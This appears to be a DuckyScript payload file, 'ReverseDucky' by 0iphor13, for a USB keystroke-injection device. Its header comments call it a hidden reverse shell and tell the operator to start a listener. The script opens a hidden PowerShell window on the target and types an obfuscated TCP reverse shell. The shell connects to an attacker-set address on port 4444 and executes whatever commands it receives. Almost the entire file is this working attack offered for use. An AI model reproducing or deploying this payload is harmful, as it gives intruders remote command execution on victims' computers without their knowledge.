48 lines
1.8 KiB
Plaintext
48 lines
1.8 KiB
Plaintext
REM ReverseDucky
|
|
REM Version 2.0
|
|
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
|
|
REM Author: 0iphor13
|
|
REM Requirement: DuckyScript 3.0
|
|
|
|
REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.
|
|
REM Define the attacker IP and PORT at line 38 & 39
|
|
REM DON'T FORGET TO START LISTENER
|
|
|
|
REM Extension DETECT_READY by Korben for best and fastest deployment
|
|
EXTENSION DETECT_READY
|
|
REM VERSION 1.0
|
|
|
|
REM USAGE:
|
|
REM Extension runs inline (here)
|
|
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
|
REM boot delay
|
|
|
|
REM TARGETS:
|
|
REM Any system that reflects CAPSLOCK will detect minimum required delay
|
|
REM Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
|
|
|
REM CONFIGURATION:
|
|
DEFINE RESPONSE_DELAY 25
|
|
DEFINE ITERATION_LIMIT 120
|
|
|
|
VAR $C = 0
|
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < ITERATION_LIMIT))
|
|
CAPSLOCK
|
|
DELAY RESPONSE_DELAY
|
|
$C = ($C + 1)
|
|
END_WHILE
|
|
CAPSLOCK
|
|
END_EXTENSION
|
|
|
|
REM Define the attackers IP & Port
|
|
DEFINE ADDRESS '0.0.0.0'
|
|
DEFINE PORT 4444
|
|
|
|
DELAY 1500
|
|
GUI r
|
|
DELAY 500
|
|
STRINGLN powershell -NoP -NonI -w h
|
|
DELAY 500
|
|
STRINGLN $0LVhbQ=[TyPE]('tExT'+'.enCOD'+'InG');$C=.('New'+'-Obj'+'ect') System.Net.Sockets.TCPClient( ADDRESS , PORT );$S=$C.GetStream();[byte[]]$b=0..65535|&('%'){0};while(($i=$S.Read($b,0,$b.Length))-ne 0){;$d=(&('New'+'-Ob'+'ject') -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$X=(&('ie'+'x') $d 2>&1 | .('Out'+'-St'+'ring'));$Z=$X+'Ducky@PS '+(&('g'+'l'))+'> ';$sbt=($0lvHBq::ASCII).GetBytes($Z);$S.Write($sbt,0,$sbt.Length);$S.Flush()};$C.Close();exit
|
|
CAPSLOCK
|